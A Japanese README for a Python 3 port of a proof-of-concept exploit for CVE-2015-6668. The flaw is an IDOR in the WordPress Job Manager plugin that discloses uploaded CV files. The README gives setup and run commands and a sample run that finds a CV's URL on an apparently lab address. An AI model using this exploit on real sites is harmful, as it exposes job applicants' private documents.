
Evangelos Mourikis による CVE-2015-6668 の POC を Python 3 用に変換したもの
Evangelos Mourikis による CVE-2015-6668 の POC を Python 3 用に変換
WordPress の Job Manager プラグインにおける IDOR 脆弱性を悪用します。
Python 3.11.9 でテスト済み
リポジトリをクローンし、仮想環境(任意)を設定し、requests をインストールして、Python 3 でスクリプトを実行します。
git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668
python3 -m venv .venv
source .venv/bin/activate
.\.venv\Scripts\activate
requests のインストールpython3 -m pip install requests
exploit.py の実行python3 ./exploit.py
$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg